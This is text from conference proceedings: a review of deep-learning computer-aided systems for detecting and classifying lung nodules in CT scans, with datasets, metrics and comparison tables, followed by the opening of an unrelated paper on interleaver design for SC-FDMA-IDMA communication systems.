human errors like detection and interpretation errors. On the other hand, computer-
aided detection and diagnosis (CAD) system eliminates manual process and problems
associated with it. In this work, an analytical review on various CAD systems for
detection and characterization of lung nodules using CT scan images is discussed.
A detailed structure of each component of CAD system is presented. Diverse CAD
systems which are developed on the basis of state-of-the-art convolutional neural
networks (CNN), such as 3D-CNN, transferable CNN, dense convolutional binary
tree network, gated dilated network, and mask region CNN, are addressed. The
algorithms performance is compared based on metrics: sensitivity (SEN), accuracy
(ACC), area under curve (AUC), etc. In order to develop more robust end-to-end
system, coupling between detection and diagnostic components is also explored.
Finally, current challenges faced in analysis and characterization of lung nodule by
the present system and future research opportunities in this field are discussed.

Keywords Computer-aided detection and diagnosis (CAD) · Lung cancer · Lung


nodules · Nodule detection · Classification · Convolutional neural network
(CNN) · Computed tomography (CT) scan

N. Ali · J. Yadav (B)


University School of Information, Communication and Technology, Guru Gobind Singh
Indraprastha University, New Delhi, India
e-mail: jyotsnayadav@ipu.ac.in

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 545
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_44
546 N. Ali and J. Yadav

1 Introduction

Cancer is abnormal growth of cell which can spread to different body parts. Tumors
or neoplasm are lump or mass of tissue, and it can either be cancerous (malignant)
or non-cancerous (benign). According to 2020 WHO report on cancer, 18.1 million
people had cancer around the world, 9.6 million death caused by it, and the estimated
numbers will double by 2040. The most frequently diagnosed cancer is lung cancer
(11.6% of all cases) with mortality rate of 18.6% of all cases [1]. Lung cancer can be
grouped into two types, namely non-small cell lung cancer (NSCLC) and small cell
lung cancer (SCLC). Compared to NSCLC, SCLC grows and spreads quickly. In
most of the cases, it is observed that, till the time it is diagnosed, cancer has already
spread. Especially for this type of situation, early detection is very crucial. CAD
system can be employed in order to efficiently detect and diagnose cancer. The main
requirement of such system is high accuracy, sensitivity, and low false positives.
Lung nodule analysis is most effective cancer prevention which broadly consists
of two steps, namely nodule detection and classification into cancerous and non-
cancerous [2]. Due to the complexity of lung nodules based on its shape, size (3–
30 mm), density (solid, semi-solid, ground glass opacity), location (central, juxta-
pleural, juxta-vascular), it is hard to generalize any specific categories [3, 4]. This
variability in nodule characterization makes diagnosis a difficult task. However, most
studies suggest that large size nodules (diameter more than 8 mm), semi-solid, and
lobulated are more certainly malignant [5, 6]. Effective screening and correct inter-
pretation of lung cancer are crucial step toward early diagnosis. Advancement in
computed tomography (CT) imaging technique and screening with low-dose CT
(LDCT) has shown promising improvement in nodule detection.
With immense popularity of LDCT screening and increase in CT scans, the job
of radiologist becomes more difficult, as manual analysis of volumetric CT scans is
time-consuming and also prone to interpretation and detection errors. In order to facil-
itate workload of radiologists, an automatic computer-aided detection and diagnosis
system is necessary. CAD system is one of the effective cancer control interven-
tions, which is helpful in early detection of malignancy and classification [7]. There
has been extensive research done on various models and algorithm of CAD system
in order to make it more efficient in terms of disease detection and classification.
Typical CAD system can be grouped into two: computer-aided detection (CADe)
system and computer-aided diagnosis (CADx) system. CADe system aims at nodule
localization, whereas CADx designed to determine whether suspicious candidate is
benign or malignant and categorize its type. Specifically, a CAD system consists
of four stages: preprocessing, nodule identification, feature extraction/selection, and
nodule classification [8, 9].
In this review, first structure of CAD system is briefly presented with various
algorithms developed for each component. Also, some of the efficient state-of-the-art
CNN schemes such as 3D-CNN (feature extraction using residual network) [10], V-
Net [11], transferable texture CNN [12], U-Net [13], faster region CNN (RCNN) [14],
mask-RCNN [15], RetinaNet (R-Net), Inflated 3D R-Net (I3DR-Net) [16], and Leaky
Computer-Aided Detection and Diagnosis of Lung Nodules … 547

Integrate and Fire Networks (LIF-Nets) [17] are also explored. Compared to tradi-
tional machine learning algorithms, deep learning has shown significant improve-
ment with respect to nodule identification and characterization. The main aim of this
review is to explicitly present each component along with reliable algorithms devel-
oped in the respective domain, as described in Fig. 1. The experimental benchmarks
necessary for the research work in this field like database and evaluation metrics
are also emphasized. Finally, existing challenges faced by CAD system in accurate
diagnosis of lung nodule, research trends, and future developments in CAD system
are discussed.
The work is divided into four sections: First section describes the anatomical struc-
ture of CAD system along with various algorithms developed, in second section,
experimental benchmark is mentioned, in the third section, the algorithms and
methods that we have surveyed are compared, and in last section, a brief conclusion
is provided with future research prospect.

Fig. 1 Diagrammatical presentation of various algorithms developed in respective domain of CAD


system
548 N. Ali and J. Yadav

2 Anatomy of CAD System

CAD system is broadly categorized into two modules, one used for nodule detection
and localization called computer-aided detection (CADe) system and other used for
classification of detected nodule into cancerous and non-cancerous called computer-
aided diagnosis (CADx) system [18]. In order to be applicable to clinical diagnosis
and reduce radiologist workload, these systems have to be combined to perform as
end-to-end system which does the complete work of detection and classification of
lung cancer [2].
CADe system for detection of nodule using CT scans can be divided into two
parts, first part basically consists of image processing component: Preprocessing:
lung segmentation and nodule enhancement, nodule detection: Initial nodule identi-
fication and nodule segmentation [15, 19], and second part consists of feature anal-
ysis components [20]. Aim of image processing component is to detect, i.e., localize
and segment suspicious regions in CT images with high sensitivity, and as a result,
false positive also increases. Whereas, feature analysis components purpose is to
reduce false positive by analyzing features of nodules by maintaining high detec-
tion sensitivity. For example, FP is reduced by varying slab thickness in maximum
intensity projection (MIP) images [21]. CADx schemes developed to categorize
detected nodule into benign or malignant [22–24]. The input provided to this system
is nodule location, which can be fed manually or by coupling with CADe system.
Generally, CADx system involves following stages: Nodule segmentation [25, 26],
feature engineering/learning: Feature extraction/selection, nodule classification [27].
CNN-based network shows better result than traditional machine learning methods.
The end-to-end CAD systems consist of combination of CADe and CADx
schemes [16, 28], with components as shown in Fig. 2. System that only detects
nodule and not characterizes them is not enough for clinical application, and thus,
a complete CAD system which performs end-to-end detection and classification is
necessary. In the next section, components of CAD system are extensively covered.

Fig. 2 CAD system structure


Computer-Aided Detection and Diagnosis of Lung Nodules … 549

2.1 Preprocessing

The input images which are fed into the system are processed images, as CT images
are 3D images and defiled by noise and artifacts [25]. In order to eliminate noises and
enhance contrast, preprocessing is done. Preprocessing in general is image processing
stage which basically performs tasks such as noise elimination [28], lung segmen-
tation, and mending lung contour [20, 29, 30] nodule enhancement [19, 31]. CT
scan images consists of two types of noises: First type is radiographic noises which
are caused due to electronic elements, and the second type is anatomical noises.
Anatomical noise is caused due to projection of local anatomical structures like ribs,
pulmonary vessels on chest scans, which makes nodule detection a difficult task.
In order to reduce noise and enhance nodule-like structures, CT images are fed
through filters, commonly used are median filter, Gaussian filter [32], dot enhance-
ment filter, NLM filter, histogram equalization, and adaptive Wiener filter [33]. Data
augmentation is crucial while training the model, and it helps to reduce overfit-
ting, thus maximizing transfer learning. Ozdemir et al. [2] performed transform
augmentation consisting of 3D rotation, reflection, and 3D scaled samples.
Lung segmentation: Nodules are present within lung, so in order to perform
nodule detection, first requirement is to segment lung. The steps involved in lung
segmentation are described in Fig. 3.
Kuo et al. [19] first optimized the images using adaptive Wiener filter, and then,
lung segmentation is performed using fast Otsu algorithm along with edge search
method which is identical to hole-filling and histogram shifting method. Rey et al.
[20] applied Otsu algorithm based lung segmentation, used morphological closing
operator for filling interior lung cavities and 3D region growing algorithm is used
for lung solation. Zhang et al. [29] performed four steps to extract lung parenchyma,
first step is histogram-based threshold segmentation used to obtain various gray
levels for lung mask generation, next step is removing anatomical noise also padding
operator used for hole-filling, third step is lung contour mending to include juxta-
pleural nodules, which otherwise gets eliminated, and the last step is that correct lung
parenchyma contour is segmented. Gong et al. [34] adopted Otsu threshold segmen-
tation method, to segment and extract lobes of lung 3D region growing algorithm
applied. Gong et al. [13] obtained lung region mask by using convex hull and dilation
to make sure it includes all nodules. To overcome juxta-pleural nodule issue (these
nodules are attached to chest wall, and when lung segmentation is performed, these

Fig. 3 Lung segmentation


550 N. Ali and J. Yadav

nodules generally get excluded as noise), Chung et al. [35] used Chan-Vese (CV)
model along with Bayesian approach.

2.2 Nodule Detection

After the segmentation of lung, the very next stage is nodule identification which
involves candidate detection and reduction of false positives [36, 37]. Lung nodules
vary in shape, size, density, location, and texture, and thus, detecting them is tedious
task. Due to variability of lung nodules, various techniques have been developed
for decades. The traditional machine learning tools were time-consuming and lack
learning adaptability. With the enormous development in deep convolutional neural
network (DCNNs), automatic nodule detection and characterization performance
have improved tremendously [13–18, 28].
Shaukat et al. [31] first enhanced nodules images using multi-scale dot enhance-
ment filter based on Hessian matrix, and then, using optimal thresholding on enhance
images, lung nodules were detected. Zheng et al. [21, 38] used four streams of
maximum intensity projection (MIP) images with four slab thicknesses to train the
2D CNNs for localizing and nodule detection. Zhang et al. [29] presented efficient
nodule detection system based on multi-scene deep learning framework (MSDLF)
with vessel removing filter, and they applied four channel CNN for four levels of
nodule. Kuo et al. [19] suggested using support vector machine (SVM) twice in
order to reduce false positive, once for nodule detection using four 2D features and
again for classification using eleven 3D features. Micro-nodule (diameter smaller
than 3 mm) detection is the most difficult job, and Monkam et al. [39] developed a
system based on ensemble learning of multi-view 3D CNNs to distinguish between
micro-nodule and non-nodules. Chenyang et al. [40] proposed a jointly optimized
nodule segmentation and classification (JNSC) method which adopts V-Net as the
backbone. Cai et al. [15] exploited two-stageMask R-CNN for nodule detection
and segmentation, first stage is region proposal network (RPN) and second stage is
outputs confidence. Li et al. [25] adopted generalized method of moments fuzzy C-
mean (GMMFCM) algorithm for segmentation of pulmonary nodules. To eliminate
false positives, Chung et al. [35] used concave point detection and circle or ellipse
Hough transform.

2.3 Feature Extraction/Selection

Once the nodule is identified, there are numerous nodule candidates generated, and
most of them are false positives. Features are measurable distinctive attributes of
segmented regions, which are prominent characteristics of nodules. Features can be
grouped based on shape, size, density, texture, and intensity [41, 42]. Wang et al.
[36] proposed mathematical descriptor using neighbor centroids clustering for spatial
Computer-Aided Detection and Diagnosis of Lung Nodules … 551

Fig. 4 Multi-view feature extraction model

feature extraction. Edge-oriented histogram (EOH) is used to extract edge features,


and multi-scale path LBP (MSPLBP) is used for texture feature extraction. Sun et al.
[26] employed multi-view network [27, 43] for feature extraction as shown in Fig. 4.
Masood et al. [18] explored multi-dimensional region-based fully convolutional
network (mRFCN) used as image classifier backbone for feature extraction. Gu
et al. [8] proposed multi-level feature mapping layer method, and Tong et al. [10]
extracted candidate features using 3D residual network. Multiple kernel learning
(MKL) algorithm is used for learning heterogeneous features. Li et al. [28] employed
genetically optimized convolutional neural network for feature extraction of nodule
CT images.

2.4 Classification

The last stage of diagnosis is nodule classification as benign (non-cancerous) or


malignant (cancerous). Once the nodule candidates are detected, features are selected
to train the system, which then predicts the malignancy. Various classification tech-
niques are employed: ML-based classifiers like SVM [10, 20, 43, 45], k-nearest
neighborhood classifier [45], Bayesian classifier [46], and CNN-based classifica-
tion [18, 24, 27, 44]. Ozdemir et al. [2] performed 3D CNN employing multiple
instance learning framework to train the network for efficient classification. Ali
et al. [12] applied transferable texture-based CNN model to improve classification
used mRFCN automated decision support system for nodule classification. Multi-
task CNN framework for 3D nodule classification [47] and multi-branch ensemble
learning architecture based on 3DCNN [48] are some suitable algorithms. Figure 5
shows a general classification model.
552 N. Ali and J. Yadav

Fig. 5 Classification model

3 Experimental Benchmarks

Implementation of successful CAD system broadly depends on two experimental


benchmarks: large datasets and performance evaluation metrics. CAD is an auto-
mated system generally based on machine learning or latest deep learning algo-
rithms; thus, for training and testing the system, large CT scan datasets are required.
Effectiveness of different system is checked using some necessary parameters.

3.1 Datasets of Lung CT Scans

One of the most widely used publically available databases is Lung Image Database
Consortium and Image Database Resource (LIDC-IDRI). Initiative is one of the
largest available public databases for lung cancer. It consists of 1018 cases that
include clinical thoracic CT scans in XML file format [49]. National Lung Screening
Trial (NLST) dataset: Around 54,000 participants were enrolled (2002–2004). Data
on cancer diagnosis and deaths were collected all the way on December 31, 2009
[50]. Vision and Image Analysis group and International Early Lung Cancer Action
Program (VIA/I-ELCAP) database consists of 50 LDCT scans of 1.25 mm slice
thickness, and nodule size in this database is quite small [51]. Nederlands–Leuvens
Longkanker Screening Onderzoek trial (NELSON) consists of LDCT scans, having
data of approximately 15,822 participants. Each set of images in DICOM format
is 1 mm slice thickness with 0.7 mm overlap between slices. Annotation generated
with either LungCare software or manually [52].

3.2 Evaluation Metrics

Accuracy, TPR, and FPR. Parameters required for the calculation of accuracy, Param-
eters required for the calculation of Accuracy, True Positive Rates (TPR) and False
Positive Rates (FPR) are: True Positives (TP), True Negatives (TN), False Positives
Computer-Aided Detection and Diagnosis of Lung Nodules … 553

(FP) and False Negative (FN) [10, 36]. TPR also known as sensitivity or recall is
given by Eq. 1, FPR is given by Eq. 2, and accuracy predicts exactness to original
samples given by Eq. 3.

TP
Sensitivity/TPR/Recall = (1)
TP + FN
FP
FPR = (2)
FP + TN
TP + TN
Accuracy = (3)
TP + TN + FP + FN

CPM. Competition performance metric takes average sensitivity at predefined


FPRs such as 0.125, 0.25, 0.5, 1, 2, 4, 8 FPs per scan as described by Eq. 4.

1 
CPM = s(i) , FPs = {0.125, 0.25, 0.5, 1, 2, 4, 8} (4)
7 i=F P S

4 Discussion

The CAD systems based on various algorithms are compared based on two factors:
How efficiently system can detect a nodule and discriminating them into benign and
malignant with reduced FPs. Table 1 gives the comparison between different algo-
rithm used for nodule detection, and Table 2 gives comparison between classification
systems.

5 Conclusion

In this work, a detailed review on various algorithms of CAD system developed


for detection and diagnosis of lung cancer using CT images is presented. The algo-
rithms adopted for nodule detection and classification are compared. Among the
papers discussed, Li et al. [25] proposed method (GMMFCM) that shows best perfor-
mance in case of nodule detection, and Ali et al. [12] transferable texture-based
CNN classification method provides comparatively better accuracy. The system
employing multiple dimensional CNN algorithms like multi-view, multi-task, multi-
section, texture-based, and hybrid feature extraction has shown incredible perfor-
mance compared to general CNN network. One of the main challenges faced by
CAD system is lack of publicly available database, thus need to work more on
prominent unsupervised learning methodologies. Vessel segmentation is another
554 N. Ali and J. Yadav

Table 1 Comparison
S. No First author, Algorithm Outcome
between different nodule
publication year
detection models
1 Ye et al. [11], Modified V-Net, 0.934(SEN for
2020 SVM classifier 8FPs/scan)
2 Kuo et al. [19], SVM 91% (SEN)
2020
3 Rey et al. [20], SVM (C-SVC) 82.9% (SEN)
2020
4 Zheng et al. [21], MIP slab 90% (SEN)
2020 thickness 9 mm
5 Li et al. [25], GMMFCM 0.9998(ACC),
2020 0.9756(SEN)
6 Zhang et al. [29], MSDLF 98.7%
2020 (efficient)
7 Gu et al. [30], Vessel 0.986(SEN)
2020 suppression
8 Roy et al. [32], Unsupervised 0.90(SEN),
2020 method 0.95(ACC)
Supervised 0.84(SEN),
method 0.95(ACC)
9 Gong et al. [37], 3D-CenterNet 90.6(CPM)
2020
10 Tan et al. [53], 3D-CNN 0.990(SEN)
2020

Table 2 Comparison between different classification models


S. No First author, publication year Algorithm Outcome
1 Tong et al. [10], 2021 ResNet-34 + MKL 90.65% (ACC)
2 Ali et al. [12], 2020 Transferable texture CNN 96.69% (ACC)
3 Shi et al. [17], 2020 LIF-classification Net 94.14% (ACC)
4 Zhai et al. [47], 2020 MT-CNN 97.3% (AUC)
5 Kuang et al. [54], 2020 MDGAN + Encoder 95.32% (ACC)
6 Hussein et al. [9], 2019 3D CNN + MTL 91.26% (ACC)
7 Xie et al. [27], 2019 MV-KBC deep model 91.60% (ACC)
8 Sahu et al. [43], 2019 Multi-section CNN 0.98(AUC), 93.18% (ACC)
9 Al-Shabi et al. [55], 2019 GD-CNN 92.57% (ACC)

challenging task, and thus, the accurate elimination of vessels and anatomical noises
will ensure reduced false positives (FP). For future research studies, in order to
address database problem unsupervised learning methodology need to be explored
more along with multi-modality fusion techniques. Also need to emphasis on noise
elimination techniques for reduction of false positives.
Computer-Aided Detection and Diagnosis of Lung Nodules … 555

References

1. WHO Report on Cancer, Setting Priorities, Investing Wisely and Providing Care for All,World
Health Organization, Geneva, Switzerland. (2020).
2. Ozdemir, O., Russell, R. L., & Berlin, A. A. (2020). A 3D probabilistic deep learning system
for detection and diagnosis of lung cancer using low-dose CT scans. IEEE Transactions on
Medical Imaging, 39(5), 1419–1429. https://doi.org/10.1109/TMI.2019.2947595
3. Siegel, R. L., Miller, K. D., & Jemal, A. (2020). Cancer statistics, 2020. Cancer Journal for
Clinicians, 70(1), 7–30. https://doi.org/10.3322/caac.21590
4. De Koning, H. J. (2020). Reduced lung-cancer mortality with volume CT screening in a random-
ized trial. New England Journal of. Medicine, 382(6), 503–513. https://doi.org/10.1056/nejmoa
1911793
5. Snoeckx, A., Reyntiens, P., Desbuquoit, D., Spinhoven, M. J., Van Schil, P. E., Meerbeeck, J.
P., & Parizel, P. M. (2018). Evaluation of the solitary pulmonary nodule: Size matters, but do
not ignore the power of morphology. Insights into Imaging, 9(1), 73–86.
6. Zhou, Q. (2016). China national guideline of classification, diagnosis and treatment for lung
nodules. Zhongguo Zhi, 19(12), 793–798. https://doi.org/10.3779/j.issn.1009-3419.2016.12.12
7. Cressman, S. (2017). The cost-effectiveness of high-risk lung cancer screening and drivers of
program efficiency. Journal of Thoracic Oncology, 12(8), 1210–1222. https://doi.org/10.1016/
j.jtho.2017.04.021
8. Gu, J., Tian, Z., & Qi, Y. (2020). Pulmonary nodules detection based on deformable convolution.
IEEE Access, 8, 16302–16309. https://doi.org/10.1109/ACCESS.2020.2967238
9. Hussein, S., Kandel, P., Bolan, C. W., Wallace, M. B., & Bagci, U. (2019). Lung and pancreatic
tumour characterization in the deep learning era: Novel supervised and unsupervised learning
approaches. IEEE Transactions on Medical Imaging, 38(8), 1777–1787. https://doi.org/10.
1109/TMI.2019.2894349
10. Tong, C., et al. (2021). Pulmonary nodule classification based on heterogeneous features
learning. IEEE Journal on Selected Areas in Communications, 39(2), 574–581. https://doi.
org/10.1109/JSAC.2020.3020657
11. Ye, Y., Tian, M., Liu, Q., & Tai, H.-M. (2020). Pulmonary nodule detection using v-net and
high-level descriptor based SVM classifier. IEEE Access, 8, 176033–176041. https://doi.org/
10.1109/ACCESS.2020.3026168
12. Ali, I., Muzammil, M., Haq, I. U., Khaliq, A. A., & Abdullah, S. (2020). Efficient lung nodule
classification using transferable texture convolutional neural network. IEEE Access, 8, 175859–
175870. https://doi.org/10.1109/ACCESS.2020.3026080
13. Gong, L., Jiang, S., Yang, Z., et al. (2019). Automated pulmonary nodule detection in CT
images using 3D deep squeeze-and-excitation networks. International Journal of Computer
Assisted Radiology and Surgery, 14, 1969–1979. https://doi.org/10.1007/s11548-019-01979-1
14. Su, Y., Li, D., & Chen, X. (2020). Lung nodule detection based on faster R-CNN frame-
work. Computer Methods and Programs in Biomedicine. https://doi.org/10.1016/j.cmpb.2020.
105866
15. Cai, L., Long, T., Dai, Y., & Huang, Y. (2020). Mask R-CNN-based detection and segmentation
for pulmonary nodule 3D visualization diagnosis. IEEE Access, 8, 44400–44409. https://doi.
org/10.1109/ACCESS.2020.2976432
16. Harsono, I. W., Liawatimena, S., & Cenggoro, T. W. (2020). Lung nodule detection and clas-
sification from Thorax CT-scan using RetinaNet with transfer learning. Journal King Saud
University-Computer and Information Sciences. https://doi.org/10.1016/j.jksuci.2020.03.013.
ISSN 1319-1578.
17. Shi, Y., Li, H., Zhang, H., Wu, Z., & Ren, S. (2020). Accurate and efficient LIF-Nets for 3D
detection and recognition. IEEE Access, 8, 98562–98571. https://doi.org/10.1109/ACCESS.
2020.2995886
18. Masood, A., et al. (2020). Automated decision support system for lung cancer detection and
classification via enhanced RFCN with multilayer fusion RPN. IEEE Transactions on Industrial
Informatics, 16(12), 7791–7801. https://doi.org/10.1109/TII.2020.2972918
556 N. Ali and J. Yadav

19. Kuo, C-F. J., Huang, C-C., Siao, J-J., Hsieh, C-W., Huy, V. Q., Ko, K-H., & Hsu, H-H. (2020).
Automatic lung nodule detection system using image processing techniques in computed
tomography. Biomedical Signal Processing and Control, 56, 101659. https://doi.org/10.1016/
j.bspc.2019.101659. ISSN 1746-8094.
20. Rey, A., Arcay, B., & Castro, A. (2020). A hybrid CAD system for lung nodule detection using
CT studies based in soft computing. Expert Systems with Applications, 114259. https://doi.org/
10.1016/j.eswa.2020.114259. ISSN 0957-4174.
21. Zheng, S., Cui, X., Vonder, Raymond, M., Veldhuis, N. J., Ye, Z., Vliegenthart, R., Oudkerk, M.,
& van Ooijen, P. M. A. (2020). Deep learning-based pulmonary nodule detection: Effect of slab
thickness in maximum intensity projections at the nodule candidate detection stage. Computer
Methods and Programs in Biomedical, 196, 105620. https://doi.org/10.1016/j.cmpb.2020.105
620. ISSN 0169-2607.
22. Suresh, S., & Mohan, S. (2019). NROI based feature learning for automated tumor stage
classification of pulmonary lung nodules using deep convolutional neural networks. Journal
of King Saud University-Computer and Information Sciences. https://doi.org/10.1016/j.jksuci.
2019.11.013. ISSN 1319-1578.
23. Al-Shabi, M., Lee, H. K., & Tan, M. (2019). Gated-dilated networks for lung nodule classifi-
cation in CT scans. IEEE Access, 7, 178827–178838. https://doi.org/10.1109/ACCESS.2019.
2958663
24. Veasey, B. P., Broadhead, J., Dahle, M., Seow, A., & Amini, A. A. (2020). Lung nodule malig-
nancy prediction from longitudinal CT scans with siamese convolutional attention networks.
IEEE Open Journal of Engineering in Medicine and Biology, 1, 257–264. https://doi.org/10.
1109/OJEMB.2020.3023614
25. Li, X., Li, B., Liu, F., Yin, H., & Zhou, F. (2020). Segmentation of pulmonary nodules using a
GMM fuzzy C-Means algorithm. IEEE Access, 8, 37541–37556. https://doi.org/10.1109/ACC
ESS.2020.2968936
26. Sun, Y., Tang, J., Lei, W., & He, D. (2020). 3D Segmentation of pulmonary nodules based on
multi-view and semi-supervised. IEEE Access, 8, 26457–26467. https://doi.org/10.1109/ACC
ESS.2020.2971542
27. Xie, Y., et al. (2019). Knowledge-based collaborative deep learning for benign-malignant lung
nodule classification on chest CT. IEEE Transactions on Medical Imaging, 38(4), 991–1004.
https://doi.org/10.1109/TMI.2018.2876510
28. Li, G., et al. (2020). Study on the detection of pulmonary nodules in CT images based on deep
learning. IEEE Access, 8, 67300–67309. https://doi.org/10.1109/ACCESS.2020.2984381
29. Zhang, Q., & Kong, X. (2020). Design of automatic lung nodule detection system based on
multi-scene deep learning framework. IEEE Access, 8, 90380–90389. https://doi.org/10.1109/
ACCESS.2020.2993872
30. Gu, X., Xie, W., Fang, Q., Zhao, J., & Li, Q. (2020). The effect of pulmonary vessel suppression
on computerized detection of nodules in chest CT scans. Medical Physics, 47, 4917–4927.
https://doi.org/10.1002/mp.14401
31. Shaukat, F., Raja, G., Ashraf, R., et al. (2019). Artificial neural network based classification
of lung nodules in CT images using intensity, shape and texture features. Journal of Ambient
Intelligence and Humanized Computing, 10, 4135–4149. https://doi.org/10.1007/s12652-019-
01173-w
32. Roy, R., Banerjee, P., & Chowdhury, A. S. (2020). A level set based unified framework for
pulmonary nodule segmentation. IEEE Signal Processing Letters, 27, 1465–1469. https://doi.
org/10.1109/LSP.2020.3016563
33. Samundeeswari, P., & Gunasundari, R. (2020). A novel multilevel hybrid segmentation and
refinement method for automatic heterogeneous true NSCLC nodules extraction. In 2020
5th International Conference on Devices, Circuits and Systems (ICDCS), Coimbatore, India
(pp. 226–235). https://doi.org/10.1109/ICDCS48716.2020.243586
34. Gong, J., Liu, J., Wang, L., Sun, X., Zheng, B., & Nie, S. (2018). Automatic detection
of pulmonary nodules in CT images by incorporating 3D tensor filtering with local image
feature analysis. Physica Medica, 46, 124–133. https://doi.org/10.1016/j.ejmp.2018.01.019.
ISSN 1120-1797.
Computer-Aided Detection and Diagnosis of Lung Nodules … 557

35. Chung, H., Ko, H., Jeon, S. J., Yoon, K. H., & Lee, J. (2018). Automatic lung segmentation
with Juxta-Pleural nodule identification using active contour model and bayesian approach.
IEEE Journal of Translational Engineering in Health and Medicine, 6, 1–13, 1800513. https://
doi.org/10.1109/JTEHM.2018.2837901
36. Wang, B., et al. (2020). A fast and efficient CAD system for improving the performance of
malignancy level classification on lung nodules. IEEE Access, 8, 40151–40170. https://doi.org/
10.1109/ACCESS.2020.2976575
37. Gong, Z., Li, D., Lin, J., Zhang, Y., & Lam, K.-M. (2020). Towards accurate pulmonary nodule
detection by representing nodules as points with high-resolution network. IEEE Access, 8,
157391–157402. https://doi.org/10.1109/ACCESS.2020.3019104
38. Zheng, S., Guo, J., Cui, X., Veldhuis, R. N. J., Oudkerk, M., & van Ooijen, P. M. A. (2020).
Automatic pulmonary nodule detection in CT scans using convolutional neural networks based
on maximum intensity projection. IEEE Transactions on Medical Imaging, 39(3), 797–805.
https://doi.org/10.1109/TMI.2019.2935553
39. Monkam, P., et al. (2019). Ensemble learning of multiple-view 3D-CNNs model for micro-
nodules identification in CT images. IEEE Access, 7, 5564–5576. https://doi.org/10.1109/ACC
ESS.2018.2889350
40. Chenyang, L., & Chan, S.-C. (2020). A joint detection and recognition approach to lung cancer
diagnosis from CT images with label uncertainty. IEEE Access, 8, 228905–228921. https://doi.
org/10.1109/ACCESS.2020.3044941
41. Zhou, Z., Li, S., Qin, G., Folkert, M., Jiang, S., & Wang, J. (2020). Multi-Objective based
radiomic feature selection for lesion malignancy classification. IEEE Journal of Biomedical
and Health Informatics, 24(1), 194–204. https://doi.org/10.1109/JBHI.2019.2902298
42. Khan, S. A., Nazir, M., Khan, M. A., et al. (2019). Lungs nodule detection framework
from computed tomography images using support vector machine. Microscopy Research and
Technique, 82, 1256–1266. https://doi.org/10.1002/jemt.23275
43. Sahu, P., Yu, D., Dasari, M., Hou, F., & Qin, H. (2019). A lightweight multi-section CNN for
lung nodule classification and malignancy estimation. IEEE Journal of Biomedical and Health
Informatics, 23(3), 960–968. https://doi.org/10.1109/JBHI.2018.2879834
44. Wang, W., et al. (2019). Nodule-Plus R-CNN and deep self-paced active learning for 3D
instance segmentation of pulmonary nodules. IEEE Access, 7, 128796–128805. https://doi.
org/10.1109/ACCESS.2019.2939850
45. Saba, T., Sameh, A., Khan, F., et al. (2019). Lung nodule detection based on ensemble of hand
crafted and deep features. Journal of Medical Systems, 43, 332. https://doi.org/10.1007/s10
916-019-1455-6
46. Zhang, B., et al. (2019). Ensemble learners of multiple deep CNNs for pulmonary nodules
classification using CT images. IEEE Access, 7, 110358–110371. https://doi.org/10.1109/ACC
ESS.2019.2933670
47. Zhai, P., Tao, Y., Chen, H., Cai, T., & Li, J. (2020). Multi-Task learning for lung nodule
classification on chest CT. IEEE Access, 8, 180317–180327. https://doi.org/10.1109/ACCESS.
2020.3027812
48. Cao, H., et al. (2019). Multi-Branch ensemble learning architecture based on 3D CNN for false
positive reduction in lung nodule detection. IEEE Access, 7, 67380–67391. https://doi.org/10.
1109/ACCESS.2019.2906116
49. Armato, S. G. (2011). The lung image database consortium (LIDC) and image database re-
source initiative (IDRI): A completed reference database of lung nodules on CT scans. Medical
Physics, 38(2), 915–931. https://doi.org/10.1118/1.3528204
50. NLST Datasets. Accessed: Aug. 15, 2020. [Online]. Available: https://cdas.can-cer.gov/dat
asets/nlst/
51. VIA/I-ELCAP Datasets. Accessed: Aug. 15, 2020. [Online]. Available: http://www.via.cornell.
edu/databases/lungdb.html
52. Ru Zhao, Y., Xie, X., de Koning, H. J., Mali, W. P., Vliegenthart, R., & Oudkerk, M. (2011).
NELSON lung cancer screening study. Cancer Imaging, 11(1A), S79–S84. https://doi.org/10.
1102/1470-7330.2011.9020
558 N. Ali and J. Yadav

53. Tan, M., Wu, F., Yang, B., Ma, J., Kong, D., Chen, Z., & Long, D. (2020). Pulmonary nodule
detection using hybrid two-stage 3D CNNs. Medical Physics, 47, 3376–3388. https://doi.org/
10.1002/mp.14161
54. Kuang, Y., Lan, T., Peng, X., Selasi, G. E., Liu, Q., & Zhang, J. (2020). Unsupervised multi-
discriminator generative adversarial network for lung nodule malignancy classification. IEEE
Access, 8, 77725–77734. https://doi.org/10.1109/ACCESS.2020.2987961
55. Masood, A., et al. (2020). Cloud-Based automated clinical decision support system for detection
and diagnosis of lung cancer in chest CT. IEEE Journal of Translational Engineering in Health
and Medicine, 8, 1–13, 4300113. https://doi.org/10.1109/JTEHM.2019.2955458
Efficient Interleaver Design
for SC-FDMAIDMA Systems

Roopali Agarwal and Manoj Kumar Shukla

Abstract In many analysis fields, the use of multiple interleavers has recently
attracted growing interest. Interleavers which require less memory space for storing
chip patterns are considered as more efficient. We proposed efficient non-orthogonal
interleavers that are based on quadratic permutation polynomial with maximum
spread and cyclic shifting during some steps. Our work is on the great user sepa-
ration in single-carrier frequency division multiple access and interleave division
multiple access (SC-FDMAIDMA) systems. Through this technique, generating
random permutations is associate alternate with less memory demand and complex-
ness in (SC-FDMAIDMA) systems. The findings show that random interleavers
created by the proposed methodology are sufficient to be used in the scheme of
SC-FDMAIDMA without sacrificing its performance.

Keywords SC-FDMA · Interleaving and multiuser detection · Permutation ·


Interleave division multiple access · Interleaver · Bit error rate

1 Introduction

Interleaver division multiple access is a method that uses multiple interleavers to


distinguish information from different devices in a multiuser communication scheme
in Ping et al. [1]. A common way to find random connections of size N is to indepen-
dently repeat the random process of producing interleaver K times. And each random
interleaver design draws random numbers from the same distribution, editing, and
the resulting pattern is used as an interleaver, [2]. Ping et al. revealed random and
independent interactions in [3]. The interleaver matrix can be sent to the receiver
for random interleaver, which can be very costly. To limit storage overhead, the sum
of information shared between transmitter and receiver, [4] presented power inter-
leavers. Three forms of interleavers, e.g., orthogonal interleavers, pseudorandom
interleavers, and integrated interleavers, were also defined by Pupeza et al. [5], and

R. Agarwal (B) · M. K. Shukla


Electronics Engineering Department, Harcourt Butler Technical University, Kanpur, India

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 559
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_45
560 R. Agarwal and M. K. Shukla

